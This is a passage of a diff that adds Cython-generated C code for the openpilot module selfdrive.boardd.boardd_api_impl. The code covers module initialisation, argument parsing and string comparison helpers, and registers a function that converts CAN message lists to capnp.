((PyObject*)__pyx_n_u_can), ((PyObject *)Py_True)); if (unlikely(!__pyx_tuple__3)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__3); + __Pyx_GIVEREF(__pyx_tuple__3); + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(1, 1, __pyx_L1_error); + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + return 0; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_boardd_api_impl(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_boardd_api_impl}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "boardd_api_impl", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initboardd_api_impl(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initboardd_api_impl(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_boardd_api_impl(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_boardd_api_impl(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_boardd_api_impl(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'boardd_api_impl' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("boardd_api_impl", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(1, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to boardd_api_impl pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(1, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(1, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(1, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(1, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_boardd_api_impl(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(1, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(1, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(1, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(1, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_selfdrive__boardd__boardd_api_impl) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(1, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "selfdrive.boardd.boardd_api_impl")) { + if (unlikely((PyDict_SetItemString(modules, "selfdrive.boardd.boardd_api_impl", __pyx_m) < 0))) __PYX_ERR(1, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(1, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(1, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + (void)__Pyx_modinit_type_init_code(); + (void)__Pyx_modinit_type_import_code(); + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(1, 1, __pyx_L1_error) + #endif + + /* "selfdrive/boardd/boardd_api_impl.pyx":17 + * void can_list_to_can_capnp_cpp(const vector[can_frame] &can_list, string &out, bool sendCan, bool valid) + * + * def can_list_to_can_capnp(can_msgs, msgtype='can', valid=True): # <<<<<<<<<<<<<< + * cdef vector[can_frame] can_list + * can_list.reserve(len(can_msgs)) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9selfdrive_6boardd_15boardd_api_impl_1can_list_to_can_capnp, 0, __pyx_n_s_can_list_to_can_capnp, NULL, __pyx_n_s_selfdrive_boardd_boardd_api_impl_2, __pyx_d, ((PyObject *)__pyx_codeobj__2)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_2, __pyx_tuple__3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_can_list_to_can_capnp, __pyx_t_2) < 0) __PYX_ERR(1, 17, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "selfdrive/boardd/boardd_api_impl.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: language_level=3 + * from libcpp.vector cimport vector + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_2) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init selfdrive.boardd.boardd_api_impl", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init selfdrive.boardd.boardd_api_impl"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + 